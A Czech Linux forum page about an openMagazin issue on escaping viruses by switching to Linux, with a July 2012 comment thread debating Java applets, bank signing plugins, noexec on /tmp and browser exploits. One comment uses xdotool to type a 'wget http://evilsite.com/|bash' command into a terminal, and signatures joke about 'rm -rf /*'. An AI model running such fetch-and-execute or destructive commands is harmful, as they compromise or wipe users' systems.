OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.

Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.

OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.

Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.

Komentáře

V článku o DE/WM jsem si všiml malinkého překlepu. "Awesome" se píše s "w" nikoli "v". ;-)

FrostyX.cz | 1984 was not supposed to be an instruction manual.

13.7.2012 13:49 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje.

Hmmm.

Bejvavalo

13.7.2012 15:27 MaT | skóre: 28
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

No a co jako? On dneska ještě někdo má ve výchozím stavu povolené Java Applety? Resp. on to ještě někdo dneska používá? (Minecraft se nepočítá... :-)

Open source software for open minded people. :-)

13.7.2012 15:31 Rovano
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Nevím jestli myslíte to samé, ale některé banky to striktně vyžadují.

13.7.2012 15:49 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Tak to povolím jenom té bance, ne?

(Nejlepší by stejně bylo od takové banky odejít. V IB není nic, co by nešlo vyřešit čistým HTML, ale appletem jo. Ukazuje to jen na jejich neschopnost.)

13.7.2012 18:37 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není. Navíc zákaz Java appletů řeší jen tohoto konkrétního trojského koně, ale na jiné fungovat nebude. Když uživatel odkliká spuštění neznámého softwaru, odkliká to tentokrát v Javě, příště ve Flashi a přespříště jako plugin do prohlížeče. Takovému uživateli byste musel odinstalovat webový prohlížeč, aby se nemohl přes web nakazit...

13.7.2012 19:21 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.

Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.

13.7.2012 19:26 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Elektronický podpis nikdy nechrání podepisujícího, vždy chrání příjemce zprávy -- ten jím může dokázat, že zprávu skutečně potvrdil ten, kdo je podepsán. Takže v případě banky by elektronický podpis chránil banku, měla by elektronicky podepsaný příkaz k úhradě.

Navíc to o kompromitaci appletu není pravda, něco jiného je napadnout web, něco jiného je podepsat applet důvěryhodným certifikátem.

13.7.2012 19:36 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Pokud má být cílem, aby banka mohla na moji námitku „tuhle transakci jsem nezadával“ vytáhnout soubor „potvrzuji tuto transakci, elektronicky podepsán Jan Hrach,“ pak není možné, aby tento podpis vznikal v nějakém bytecodovém blobu dodaném bankou, ve kterém banka může mít backdoor.

14.7.2012 15:35 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Ale je :). Bankovní bezpečnost prakticky nikdy nebere v potaz zákazníka. Postup v tomto případě je následující:

1) Škemrat u banky, aby transakci přezkoumala.

2) Popohánět banku, aby transakci opravdu přeskoumala.

Mezitím si nějak zajistit živobytí.

3) Vyhrožovat bance právníkem.

4) Sehnat si dobrého právníka.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

13.7.2012 16:28 Nikola Pajkovský | skóre: 16
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

noexec flag na /tmp

Save the whales. Feed the hungry. Free the mallocs

13.7.2012 16:37 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Nejde to různými kreativními způsoby obejít?

13.7.2012 16:59 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Dávno ne:

mrkva@destiny:~$ cd /tmp
mrkva@destiny:/tmp$ su
Heslo: 
root@destiny:/tmp# mkdir noexec
root@destiny:/tmp# chmod 777 noexec/
root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec
root@destiny:/tmp# exit
mrkva@destiny:/tmp$ cd noexec
mrkva@destiny:/tmp/noexec$ cp /usr/bin/id .
mrkva@destiny:/tmp/noexec$ ./id
bash: ./id: Permission denied
mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id
./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted

Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".

13.7.2012 17:10 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

No dobře, ale stejně nevím, čemu to pomůže. Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?

14.7.2012 23:12 little.owl | skóre: 22 | blog: Messy_Nest | Brighton/Praha
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.

Zajimalo by mne, co na to SELinux.

A former Red Hat freeloader.

14.7.2012 23:20 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

xdotool key Alt-F2

xdotool type xterm [RETURN]

xdotool type "wget http://evilsite.com/|bash - ; logout"

14.7.2012 23:20 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

A nebo si přes Xka odposlechne rootovské heslo :)

I invoke.

Tak takhle jsem se dlouho nenasmál

Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".

16.7.2012 08:53 melkors | skóre: 13 | blog: kdo_chce_kam
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Nekteri musi pouzivat iLO :-(

13.7.2012 13:50 FrostyX | skóre: 27 | blog: Frostyho_blog | Olomouc
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

A screenshot v kapitole o Gnome, není to unity ?

FrostyX.cz | 1984 was not supposed to be an instruction manual.

No, absence virů je dána jenom rozšířením platformy, že.

13.7.2012 16:08 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

To si nemyslím. Rozhodně biologická analogie tak úplně nefunguje. Je to jen jeden z mnoha faktorů.

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

13.7.2012 16:12 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Jak se dostává dneska malware nejčastěji do počítačů? Přiznám se, že trendy moc nesleduju, ale chodí mi spamy, ve kterých jsou očividně exploity na Javu/Flash/prohlížeč a pak ještě občas odkazy na .exe soubory. To je na Linuxu realizovatelné úplně stejně. Autoruny už nefrčí, ale viděl jsem nějaký buffer overflow při vytváření náhledů ve filemanageru. To shodou okolností nedávno bylo v Nautilu taky a libpng už taky leccos pamatuje.

13.7.2012 16:25 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem. Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

13.7.2012 16:31 D.A.Tiger | skóre: 8 | Brno
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Nemyslím, že by to bylo o tom, že by uživatelé nebyly poučeni. Spíš o tom, že ve Widlích se naučily slepě důvěřovat reklamě a systému. "Mám antivirus, firewalll, nejnovější aktualizace, tak co?" A už nesledují co jim třeba na FB servírují tvůrci nejrůznějších super COOL debilních aplikací....

A mám strach kdy se k tomu dohrabem taky. Začínám podobné móresy už trochu větřit i v našich binárních krajinách....

Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside

13.7.2012 16:38 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.

To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?

Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.

Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.

13.7.2012 16:52 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

no myslím, že ty převody jsou velmi selektivní - zcela nepoučený uživatel má windows, linux obvykle instalují ti poučení (to, že je to vůbec napadne, znamená, že o tom přemýšlí a čtou, alespoň zatím)

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

Zavirovaný počítač je otázkou ignorace ze strany uživatele... Linux je zranitelný také... a není řešením...

Bůh stvořil člověka a opice vznikly evolucí "o pár let později" z blbých lidí.

14.7.2012 08:15 vain | skóre: 16
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

To není pravda, dostal jsem virus (3 roky zpět) jen navštívením (ani jsem nemusel na nic kliknout) stránky xzone.cz v aktualizované Opeře a aktualizovaných Windows XP i s aktualizovaným antivirovým programem. Následky katastrofální, skončily reinstalací OS.

Takže to evidentně o ignoranci uživatele není.

If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.

14.7.2012 11:02 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Flash? Java? 0day? Browsení webu prostě není bezpečné, bohužel jiná použitelná možnost omezení prohlížeče než virtualizace (se značným výkonovým propadem) na Linuxu není, nepočítáme-li Links.

14.7.2012 11:09 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Flash? Java?

Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?

14.7.2012 11:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Nevím, dal jsem do Google flash remote exploit a podíval se na první odkaz. Tady je další a ještě jedna.

14.7.2012 11:24 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Takže ve Flashi 3 za posledních 6 let, v Javě pokud vím 1 za celou dobu existence. Myslím, že v samotných prohlížečích těch chyb bylo daleko víc.

14.7.2012 11:41 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

vain: Vyownovali mě přes plně aktualizovanou Operu na aktualizovaných XPčkách.

Jenda: Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.

FJ: Takové exploity byly za posledních 6 let jenom 4.

???

14.7.2012 12:00 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Asi to bude chtít trochu si ujasnit pojmy.

Flash? Java? 0day?

Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.

V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?

Mohl to být zero day exploit na Flash, Javu nebo na Operu.

14.7.2012 13:36 D.A.Tiger | skóre: 8 | Brno
Rozbalit Rozbalit vše Re: OpenMagazin vám radí: Zbavte se virů používáním linuxové distribuce

Ono se říká, že otevřený systém je tak bezpečný, jak schopný je ten, kdo se o něj stará. Uzavřený systém (rozuměj propertiální) je prý natolik bezpečný nakolik dovolí výrobce.

Ale tak jako tak - útočník/virus se k vám musí nějak vždycky dostat...

Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside